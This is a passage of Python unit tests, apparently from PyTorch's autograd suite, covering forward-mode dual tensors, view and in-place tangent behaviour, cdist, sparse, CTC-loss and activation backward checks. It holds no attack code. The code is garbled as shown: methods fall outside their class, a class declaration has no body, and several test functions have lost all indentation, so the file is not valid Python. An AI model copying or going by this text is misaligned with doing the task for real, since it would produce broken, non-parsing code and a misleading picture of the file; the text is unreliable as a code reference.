        while fwAD._current_level >= 0:
            fwAD.exit_dual_level()
        super().tearDown()
    def test_forward_level_cleanup(self):
        """Exiting a dual level must not keep the tangent alive: track the
        tangent with a weak reference and check expiry as duals are deleted."""
        def get_tensor_and_weak_ref():
            # Create a new Tensor and weak reference
            t = torch.rand(2, requires_grad=True)
            return t, torch._C._WeakTensorRef(t)
        # Sanity check that the helper function works as expected
        t, t_ref = get_tensor_and_weak_ref()
        self.assertFalse(t_ref.expired())
        del t
        self.assertTrue(t_ref.expired())
        # Main test code
        foo = torch.rand(2)
        with fwAD.dual_level():
            tangent, tangent_ref = get_tensor_and_weak_ref()
            self.assertFalse(tangent_ref.expired())
            dual = fwAD.make_dual(foo, tangent)
            self.assertFalse(tangent_ref.expired())
            # Make sure that the tangent we provided has been re-used as is
            self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
            # Make sure that dual is keeping the tangent alive
            del tangent
            self.assertFalse(tangent_ref.expired())
            # Make sure that the dual level does not keep the c++
            # version of the tangent alive
            del dual
            self.assertTrue(tangent_ref.expired())
    def test_size_check(self):
        """make_dual rejects a tangent whose size differs from the primal's."""
        foo = torch.rand(2)
        tangent = torch.rand(3)
        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
                dual = fwAD.make_dual(foo, tangent)
            # A matching-size slice of the same tangent is accepted.
            dual = fwAD.make_dual(foo, tangent[1:])
    # The following test functions check all of these behaviors:
    # - the default level system in the python binding works
    # - only level 0 exists and nesting is properly disabled
    # - printing works fine
    # - basic packing/unpacking works
    # - advanced packing/unpacking works
    #   - for memory / version counter sharing
    #   - for backward AD (regular ops)
    # - view + inplace work fine for both modes
    # - proper cleanup happens on exit of a level
    def test_default_level(self):
        """Pack/unpack inside the default dual level; after the level exits,
        unpacking the same dual yields a None tangent."""
        foo = torch.rand(2)
        bar = torch.rand(2)
        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
            self.assertEqual(baz_primal, foo)
            # We don't actually need to enforce that these two are the exact same python
            # object, feel free to relax in the future
            self.assertIs(baz_tangent, bar)
        # Outside the level, the tangent is gone.
        baz_primal, baz_tangent = fwAD.unpack_dual(baz)
        self.assertEqual(baz_primal, foo)
        self.assertEqual(baz_tangent, None)
    def test_nested_level(self):
        """Only level 0 exists for now; entering a nested level must raise."""
        with fwAD.dual_level() as level:
            # For now only level 0 exists
            self.assertEqual(level, 0)
        with fwAD.dual_level():
            with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
                nest_level = fwAD.enter_dual_level()
    def test_print(self):
        """Only dual tensors (not primals, tangents, or plain tensors) show a
        "tangent=" field in their string representation."""
        with fwAD.dual_level() as level:
            a = torch.rand(3)
            self.assertFalse("tangent=" in str(a))
            b = fwAD.make_dual(a, torch.rand(3))
            self.assertFalse("tangent=" in str(a))
            self.assertTrue("tangent=" in str(b))
            b_primal, b_tangent = fwAD.unpack_dual(b)
            self.assertFalse("tangent=" in str(b_primal))
            self.assertFalse("tangent=" in str(b_tangent))
    def test_basic_packing_unpacking(self):
        """Round-trip make_dual/unpack_dual; packing must not mutate the primal."""
        foo = torch.rand(2)
        bar = torch.rand(2)
        with fwAD.dual_level():
            baz = fwAD.make_dual(foo, bar)
            baz_primal, baz_tangent = fwAD.unpack_dual(baz)
            self.assertEqual(baz_primal, foo)
            self.assertIs(baz_tangent, bar)
            # Check that packing/unpacking did not change the input
            foo_primal, foo_tangent = fwAD.unpack_dual(foo)
            self.assertEqual(foo_primal, foo)
            self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
    """Dual tensors alias the primal/tangent storages and share version
    counters; backward-mode autograd sees pack/unpack as identity, and
    detach/no_grad/detach_ leave forward tangents intact."""
    foo = torch.rand(2)
    bar = torch.ones(2)

    # Memory and version counter check
    with fwAD.dual_level():
        dual = fwAD.make_dual(foo, bar)
        # Ensure that they are sharing memory and version counter
        self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())

        # Ensure we properly share the version counter
        self.assertEqual(foo._version, dual._version)
        foo.add_(1)
        self.assertEqual(foo._version, dual._version)

        # Unpacking should only create aliases as well
        dual_primal, dual_tangent = fwAD.unpack_dual(dual)
        self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
        self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
        # And the tangent is actually re-used as-is so it is still the same Tensor
        self.assertIs(dual_tangent, bar)

        # Ensure we properly share the version counter
        self.assertEqual(foo._version, dual_primal._version)
        foo.add_(1)
        self.assertEqual(foo._version, dual_primal._version)
        self.assertEqual(bar._version, dual_tangent._version)
        bar.add_(1)
        self.assertEqual(bar._version, dual_tangent._version)

    # backward mode check
    with fwAD.dual_level():
        foo.requires_grad_()
        bar.requires_grad_()

        # Check that backward gradients properly propagates through packing/unpacking
        dual = fwAD.make_dual(foo, bar)
        p, t = fwAD.unpack_dual(dual)

        # The primal path depends only on foo, the tangent path only on bar.
        gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
        self.assertEqual(gfoo, torch.ones_like(foo))
        self.assertIsNone(gbar)

        gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
        self.assertIsNone(gfoo)
        self.assertEqual(gbar, torch.ones_like(bar))

        # Check that forward gradients are not impacted by detach
        detached_dual = dual.detach()
        out = detached_dual * 2
        p, t = fwAD.unpack_dual(out)
        self.assertFalse(p.requires_grad)
        self.assertFalse(t.requires_grad)
        self.assertEqual(p, foo * 2)
        self.assertEqual(t, bar * 2)

        # Check that forward gradients are not impacted by no_grad
        with torch.no_grad():
            out = dual * 3
        p, t = fwAD.unpack_dual(out)
        self.assertFalse(p.requires_grad)
        self.assertFalse(t.requires_grad)
        self.assertEqual(p, foo * 3)
        self.assertEqual(t, bar * 3)

        # Check that forward gradients are not impacted by inplace detach
        dual = dual.clone()
        dual.detach_()
        out = dual * 2
        p, t = fwAD.unpack_dual(out)
        self.assertFalse(p.requires_grad)
        self.assertFalse(t.requires_grad)
        self.assertEqual(p, foo * 2)
        self.assertEqual(t, bar * 2)
def test_view_inplace_non_differentiable_views(self):
    """In-place ops on a dual update its primal value everywhere, but must
    not attach tangents to non (forward) differentiable views of the same
    storage."""
    original_foo = torch.rand(2, dtype=torch.double)
    original_bar = torch.ones(2, dtype=torch.double)

    # Do clones to be able to compare the values updated inplace
    # with the original content of these Tensors
    foo = original_foo.clone()
    bar = original_bar.clone()

    with fwAD.dual_level():
        # Note that in this test, we use "update" to mean computing the right tangent for the dual
        # All the inplace operations here are expected to update the primal value of the Tensors but
        # not always their tangents.
        # Also all mentions of "non differentiable view" here means non forward differentiable view
        # unless specified otherwise.
        # See note [Forward Grad View/inplace] for more details on how these views work.

        # Check that inplace ops do not update non-differentiable views
        # Non differentiable view
        dual = fwAD.make_dual(foo, bar)
        dual *= 2
        # Check that non differentiable view's tangent was not updated
        self.assertIsNone(fwAD.unpack_dual(foo)[1])
        # Check that the computed result is correct
        self.assertEqual(bar, original_bar * 2)
        self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
        self.assertEqual(foo, original_foo * 2)
        self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)

        # Other non differentiable view
        dual_primal, dual_tangent = fwAD.unpack_dual(dual)
        self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
        self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])

        dual_primal *= 2
        # Ensure dual's tangent did not change
        self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
        self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)

        dual_tangent *= 2
        # Ensure dual's primal did not change
        self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
        self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
    """In-place ops propagate tangents into (forward) differentiable views
    but stop at non differentiable ones."""
    original_foo = torch.rand(2)
    original_bar = torch.ones(2)

    # Do clones to be able to compare the values updated inplace
    # with the original content of these Tensors
    foo = original_foo.clone()
    bar = original_bar.clone()

    with fwAD.dual_level():
        # Check that inplace ops do update differentiable view but stop at non differentiable ones
        # A non differentiable view
        dual = fwAD.make_dual(foo, bar)
        # A differentiable view
        view = dual.narrow(0, 0, 1)
        view *= 2
        # Check that non differentiable view was not updated
        self.assertIsNone(fwAD.unpack_dual(foo)[1])
        # Check that differentiable view was updated
        self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
        self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))

        # Check that we track differentiable view even for Tensors that are not dual
        baz = torch.rand(2)
        baz += dual
        self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])

        # Updates on view should as well
        baz = torch.rand(2)
        baz[0] = dual[0]
        self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
        # Unused values get a gradient of 0
        self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)

        # Check that backward non-differentiable views don't prevent gradient update
        baz = torch.rand(2)
        view = baz.detach()
        view += dual
        self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
def test_grad_cleanup(self):
    """Tangents must not leak across dual levels: exiting a level clears
    them, and a fresh level starts with no tangents attached."""
    foo = torch.rand(2)
    bar = torch.rand(2)
    baz = torch.rand(2)

    with fwAD.dual_level():
        dual = fwAD.make_dual(foo, bar)
        self.assertIsNone(fwAD.unpack_dual(foo)[1])
        self.assertIs(fwAD.unpack_dual(dual)[1], bar)

    # The tangent is gone once the level has exited.
    self.assertIsNone(fwAD.unpack_dual(dual)[1])

    with fwAD.dual_level():
        # The new level starts clean.
        self.assertIsNone(fwAD.unpack_dual(foo)[1])
        new_dual = fwAD.make_dual(foo, baz)

        dual_primal, dual_tangent = fwAD.unpack_dual(dual)
        new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
        self.assertEqual(dual_primal, new_dual_primal)
        self.assertIsNone(dual_tangent)
        self.assertEqual(new_dual_tangent, baz)
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
    """min/max/median/nanmedian must split the gradient evenly across all
    tied extremal values (three ties here -> each gets 1/3)."""
    for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
        x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
        # NOTE(review): x2 is created on the default device rather than
        # `device` — confirm whether that is intentional.
        x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
        for x in [x1, x2]:
            y = f(x)
            y.backward()
            self.assertEqual(x.grad.sum(), 1.)
            self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_cdist(self, device):
    """cdist (p=2) backward must run on large inputs without error."""
    def _test_euclidean_large_cdist(sizex, sizey=None):
        if sizey is None:
            sizey = sizex
        x = torch.randn(sizex, device=device, dtype=torch.float)
        y = torch.randn(sizey, device=device, dtype=torch.float)
        eps = 1e-6
        # to avoid extremum
        x = x - (((x - y) < eps).float() * 2 * eps)
        x.requires_grad = True
        y.requires_grad = True
        dist = torch.cdist(x, y, p=2)
        # Do a backward pass to check that it is valid for large
        # matrices
        loss = dist.sum()
        loss.backward()

    _test_euclidean_large_cdist((2000, 5))
# Ensure that cdist backward with p<1 does not produce NaNs
def test_cdist_grad_p_lt_1_no_nan(self, device):
    """cdist gradients for 0 < p < 1 must stay NaN-free; inputs are offset
    so no pairwise distance is exactly zero."""
    for p in [0.99, 0.7, 0.5, 0.1, 0.01]:
        x = torch.randn(1, 2, device=device)
        # Offset y so that x != y everywhere.
        y = x.clone().detach() + torch.tensor([[1., 0.]], device=device)
        x.requires_grad = True
        y.requires_grad = True
        result = torch.cdist(x, y, p=p)
        result.backward(torch.ones_like(result))
        self.assertFalse(torch.isnan(x.grad).any())
        self.assertFalse(torch.isnan(y.grad).any())
def test_cdist_same_inputs(self, device):
# Test to detect issues in cdist gradient calculation
# When the distances are 0
sizex = (1, 27, 32)
for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]:
x = torch.randn(sizex, device=device, dtype=torch.float)
dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float)
y = x.clone()
eps = 1e-6
x.requires_grad = True
d = torch.cdist(x, y)
d.backward(dist_grad)
# Check that the backward passs does not contain invalid
# values such as nan or inf
assert torch.isfinite(x.grad).all()
def test_parameter_resize(self, device):
    """Shrinking a Parameter's storage via set_() and then using it in
    autograd must work; the stale grad is cleared after each resize."""
    asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
    for i in range(2):
        with torch.no_grad():
            # Drop the first element in place; the old grad no longer
            # matches the new shape, so clear it.
            asd.set_(asd[1:])
            asd.grad = None

        m = torch.cat((asd, asd))
        m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
    # See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
    """gradcheck a sparse_coo_tensor construct/values round-trip, and check
    that `_values()` is non-differentiable."""
    def _test(size, sparse_dim, nnz, device):
        v_size = [nnz] + list(size[sparse_dim:])
        i = torch.rand(sparse_dim, nnz)
        # Scale random fractions up to valid indices, then truncate to long.
        i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
        i = i.to(torch.long)

        inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
        other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
                                     dtype=dtype)[0]

        def fn(v):
            x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
            y = (x + other).coalesce()
            yv = y.values()
            new_v = yv.tanh()
            z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
            return z.coalesce().values()

        gradcheck(fn, (inp,), check_batched_grad=False)
        # FIXME: make gradgradcheck work.
        # gradgradcheck(fn, (inp,), check_batched_grad=False)

        # assert that _values is non-differentiable
        with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
            other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))

    # Cover all combinations of empty sparse dims, empty dense dims and
    # zero nnz.
    for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
        sparse_size = [] if empty_i else [2, 1]
        dense_size = [1, 0, 2] if empty_v else [1, 2]
        nnz = 0 if empty_nnz else 5
        _test(sparse_size + dense_size, len(sparse_size), nnz, device)
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
    """Sparse and dense gradients flowing into the same leaf must accumulate
    correctly regardless of arrival order."""
    class FixedGradientFunction(Function):
        # Identity forward; backward returns a fixed, pre-chosen gradient.
        @staticmethod
        def forward(ctx, x, grad_x):
            ctx.save_for_backward(grad_x)
            return x

        @staticmethod
        def backward(ctx, grad_x):
            saved_grad_x, = ctx.saved_tensors
            return saved_grad_x, None

    size = torch.Size([6, 3, 2])
    i1 = torch.tensor([
        [0, 3, 4],
        [0, 2, 2],
    ], dtype=torch.long)
    v1 = make_tensor([3, 2], dtype=dtype, device=device)
    sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device)
    i2 = torch.tensor([
        [0, 1, 3, 4],
        [0, 1, 2, 2],
    ], dtype=torch.long)
    v2 = make_tensor([4, 2], dtype=dtype, device=device)
    sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device)
    dense_grad = torch.rand(size, device=device, dtype=dtype)
    fn = FixedGradientFunction

    # sparse first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # dense first
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2)
    # sparse only
    x = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
    (fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward()
    self.assertEqual(x.grad, sparse_grad1 + sparse_grad2)
# autograd tests via common_method_invocations don't allow input tensors to
# be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when
# check_sparse_nnz is set to False.)
def test_sparse_mask_autograd(self, device):
    """Backward through sparse_mask: grad is 1 where the mask keeps values,
    0 elsewhere (i.e. equal to the dense mask)."""
    tensor = torch.randn(3, requires_grad=True, device=device)
    mask = torch.ones(3, device=device)
    mask[1] = 0
    mask = mask.to_sparse()
    converted = tensor.sparse_mask(mask).to_dense()
    converted.sum().backward()
    self.assertEqual(tensor.grad, mask.to_dense())
def test_pyscalar_conversions(self, device):
    """int()/float()/bool() conversions of one-element tensors, including
    nan/inf edge cases, precision loss and overflow errors."""
    def _test_pyscalar_conversions(t, integral_conv):
        # integral -> integral
        l = t(torch.zeros(1, 1, 1, dtype=torch.long))
        pyscalar = -12345
        l[0] = pyscalar
        self.assertEqual(integral_conv(l), pyscalar)

        # floating point -> floating point
        f = Variable(t(torch.randn(1, 1, dtype=torch.double)))
        pyscalar = -12345.1
        f[0] = pyscalar
        self.assertEqual(float(f), pyscalar)
        f[0] = nan
        self.assertTrue(math.isnan(float(f)))
        f[0] = inf
        self.assertEqual(float(f), inf)
        f[0] = -inf
        self.assertEqual(float(f), -inf)

        # integral -> floating point
        # check we can convert something that loses precision
        pyscalar = 1234567890123456789
        self.assertNotEqual(pyscalar, integral_conv(float(pyscalar)))
        l[0] = pyscalar
        self.assertEqual(float(l), float(pyscalar))

        # floating point -> integral
        f[0] = nan
        self.assertRaises(ValueError, lambda: integral_conv(f[0]))
        f[0] = inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = -inf
        self.assertRaises(OverflowError, lambda: integral_conv(f[0]))
        f[0] = sys.float_info.max
        self.assertEqual(integral_conv(f), sys.float_info.max)

        # bool, nonzero
        def test_nonzero(tensor, value, expected):
            tensor[0] = value
            self.assertEqual(expected, bool(tensor))
            self.assertEqual(expected, True if tensor else False)

        test_nonzero(l, 0, False)
        test_nonzero(l, -2, True)
        test_nonzero(f, 0.0, False)
        test_nonzero(f, sys.float_info.min, True)
        test_nonzero(f, nan, bool(nan))
        test_nonzero(f, inf, bool(inf))
        test_nonzero(f, -inf, bool(-inf))

    _test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x))
@dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
@dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64)
def test_set_requires_grad_only_for_floats(self, device, dtype):
    """requires_grad can only be turned on for floating point dtypes;
    turning it off must always work."""
    def f1():
        a = torch.ones(1, dtype=dtype, device=device)
        a.requires_grad_()

    def f2():
        a = torch.ones(1, dtype=dtype, device=device)
        a.requires_grad = True

    def f3():
        torch.ones(1, dtype=dtype, device=device, requires_grad=True)

    a = torch.ones(1, dtype=dtype, device=device)
    a.requires_grad = False  # should always work
    a.requires_grad_(False)

    for f in [f1, f2, f3]:
        if dtype.is_floating_point:
            f()
        else:
            with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)):
                f()
@onlyCUDA
def test_advanced_indexing_backwards_large(self, device):
    """Backward through advanced indexing of a large (1 << 16 rows) tensor."""
    # See https://github.com/pytorch/pytorch/issues/22843
    n = (1 << 16)
    x = torch.rand(n, 1, device=device, requires_grad=True)
    a = x[:, [0]]
    a.sum().backward()
    self.assertEqual(x.grad, torch.ones(n, 1, device=device))
def test_advanced_indexing_backwards_memory_format(self, device):
    """Advanced-indexing backward with a channels_last index tensor must not
    crash."""
    # See https://github.com/pytorch/pytorch/issues/36956
    shape = (2, 8, 1, 2)
    i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last)
    x = torch.randn(shape, requires_grad=True, device=device)
    x[i].sum().backward()
def _test_reentrant_parent_error_on_cpu(self, device):
    """Helper: the parent CPU graph errors while a much longer reentrant
    child graph runs on `device`; no grads may be accumulated anywhere."""
    t1 = torch.rand([3, 3], requires_grad=True)
    t2 = torch.rand([3, 3], device=device, requires_grad=True)
    t3 = torch.rand([3, 3], device=device, requires_grad=True)

    # Parent graph cpu graph.
    t4 = t1 * t1
    t5 = TestAutograd.SimulateBackwardError.apply(t4)

    # Child gpu graph (much longer than parent graph).
    prev = t2 * t2
    for i in range(10):
        prev = prev * t2
    reentrant_root = prev

    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will take much longer.
            reentrant_root.backward()
            return grad

    # Parent gpu graph.
    t6 = ReentrantFunc.apply(t3)
    t7 = t6 * t6

    # Parent graph will error out first, while child graph will continue executing.
    with self.assertRaisesRegex(Exception, "Simulate error"):
        torch.autograd.backward([t5.sum(), t7.sum()])

    # No grads should be accumulated since child graph will stop execution
    # after parent receives error.
    self.assertIsNone(t2.grad)
    self.assertIsNone(t1.grad)
    self.assertIsNone(t3.grad)
@onlyCUDA
def test_reentrant_parent_error_on_cpu(self, device):
    """Run the reentrant-error scenario and verify CUDA memory returns to
    its initial level once autograd cleans up the failed tasks."""
    before = CudaMemoryLeakCheck.get_cuda_memory_usage()

    # Run as separate function so that gc can clean up everything when we
    # check for memory usage.
    self._test_reentrant_parent_error_on_cpu(device)

    # Wait for autograd thread to cleanup failed tasks.
    after = CudaMemoryLeakCheck.get_cuda_memory_usage()
    start = time.time()
    # Poll for up to 30s; cleanup happens asynchronously.
    while before != after and time.time() - start < 30:
        time.sleep(0.1)
        after = CudaMemoryLeakCheck.get_cuda_memory_usage()

    self.assertEqual(before, after)
# test for backward in https://github.com/pytorch/pytorch/issues/15511
def test_pdist_large(self, device):
def func(x):
return torch.pdist(x, p=2)
# shape[0] should be able to be (roughly) arbitrarily large, but the kernel
# is currently limited to smaller sizes (see issue above); this is just testing
# a floor.
shape = (1000, 1)
x = torch.randn(shape, device=device).requires_grad_()
output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
def test_where_functional(self, device):
    """gradcheck/gradgradcheck torch.where, with and without broadcasting."""
    x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    cond = mask_not_all_zeros((5, 5)).to(device=device)

    def where(cond, x, y):
        return torch.where(cond, x, y)

    gradcheck(where, [cond, x, y], raise_exception=True)
    gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])

    # Broadcasting case: x and y broadcast against each other.
    x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
    gradcheck(where, [cond, x, y], raise_exception=True)
    gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
    """gradcheck/gradgradcheck torch.where with a Python scalar supplying
    either the "true" or the "false" branch."""
    x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    scalar = 4.
    cond = mask_not_all_zeros((5, 5)).to(device=device)

    def where_scalar_first(cond, x):
        # Scalar provides the values where cond is True.
        return torch.where(cond, scalar, x)

    def where_scalar_second(cond, x):
        # Scalar provides the values where cond is False.
        return torch.where(cond, x, scalar)

    for fn in (where_scalar_first, where_scalar_second):
        gradcheck(fn, (cond, x))
        gradgradcheck(fn, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
    """gradcheck ctc_loss over varying input/target lengths, including
    zero-length targets for some or all batch elements."""
    batch_size = 64
    num_labels = 101
    target_length = 15
    gradcheck_input_size = 10

    # Modes for zeroing out target lengths.
    ZERO_NONE = 0
    ZERO_SOME = 1
    ZERO_ALL = 2

    # input_length, vary_lengths, zero_lengths
    tests = [(150, False, ZERO_NONE),
             (150, True, ZERO_NONE),
             (50, True, ZERO_SOME),
             (50, True, ZERO_ALL)]
    if 'cuda' in device:
        tests += [(50, False, ZERO_NONE),
                  (50, True, ZERO_NONE),
                  (150, True, ZERO_SOME),
                  (150, True, ZERO_ALL)]

    for input_length, vary_lengths, zero_mode in tests:
        targets = torch.randint(1, num_labels, (batch_size, target_length),
                                device=device, dtype=torch.long)
        x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
        tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
                                   device=device)
        input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
                          if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
        if zero_mode == ZERO_ALL:
            target_lengths = [0 for _ in range(batch_size)]
        else:
            target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
                               if vary_lengths else target_length) for _ in range(batch_size)]
            if zero_mode == ZERO_SOME:
                idxes = torch.randint(0, batch_size, (10,))
                for i in idxes:
                    target_lengths[i] = 0

        def ctc_after_softmax(x):
            # Tile the small gradcheck input up to the full log-prob shape
            # so gradcheck stays cheap.
            x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
                      .view(input_length, batch_size, num_labels))
            log_probs = torch.log_softmax(x_full, 2)
            return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)

        gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
    """The cuDNN ctc_loss gradient must match the native implementation."""
    batch_size = 16
    input_length = 30
    num_labels = 101
    target_length = 15
    targets = torch.randint(1, num_labels, (batch_size * target_length,),
                            device='cuda', dtype=torch.long)
    log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
    log_probs.requires_grad_()

    input_lengths = batch_size * [input_length]
    target_lengths = batch_size * [target_length]
    grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
    # Reference: native implementation with cuDNN disabled.
    with torch.backends.cudnn.flags(enabled=False):
        loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
        grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
    # int32 CPU targets are used here; the grad_fn is checked below to make
    # sure the cuDNN path was actually taken.
    loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
                                              input_lengths, target_lengths, reduction='none')
    self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
    grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
    self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
    """In-place leaky_relu/rrelu with a negative slope is not invertible, so
    backward must raise and ask for the out-of-place version."""
    a = torch.tensor([-1., 1.], device=device, requires_grad=True)
    b = torch.nn.functional.leaky_relu_(a.clone(), -2)
    with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
        b.backward(torch.ones(2, device=device))

    a = torch.tensor([-1., 1.], device=device, requires_grad=True)
    b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
    with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
        b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
    """In-place elu/celu with a negative alpha is not invertible, so
    backward must raise and ask for the out-of-place version."""
    a = torch.tensor([-1., 1.], device=device, requires_grad=True)
    b = torch.nn.functional.elu_(a.clone(), alpha=-2)
    with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
        b.backward(torch.ones(2, device=device))

    a = torch.tensor([-1., 1.], device=device, requires_grad=True)
    b = torch.nn.functional.celu_(a.clone(), alpha=-2)
    with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
        b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
    """Intermediates not needed for backward must be freed eagerly, so
    allocated CUDA memory does not grow after rebuilding the loss."""
    x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
    m = torch.randn(1, 3, 1, 1, device=device)

    z = x.sum()
    base_mem = torch.cuda.memory_allocated()
    z = ((x + 2) * m).sum()
    end_mem = torch.cuda.memory_allocated()

    # In the end the memory usage should remain equal, because neither of
    # (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
    # previous allocation of z had the same size as the current one.
    self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
    """pin_memory() returns a new, differentiable copy with the same values."""
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    self.assertEqual(x, x.pin_memory())
    self.assertIsNot(x, x.pin_memory())
    self.assertTrue(x.pin_memory().requires_grad)
    gradcheck(lambda x: x.pin_memory(), [x])
    gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
    # This test is not intended to ensure correctness of nvtx ranges.
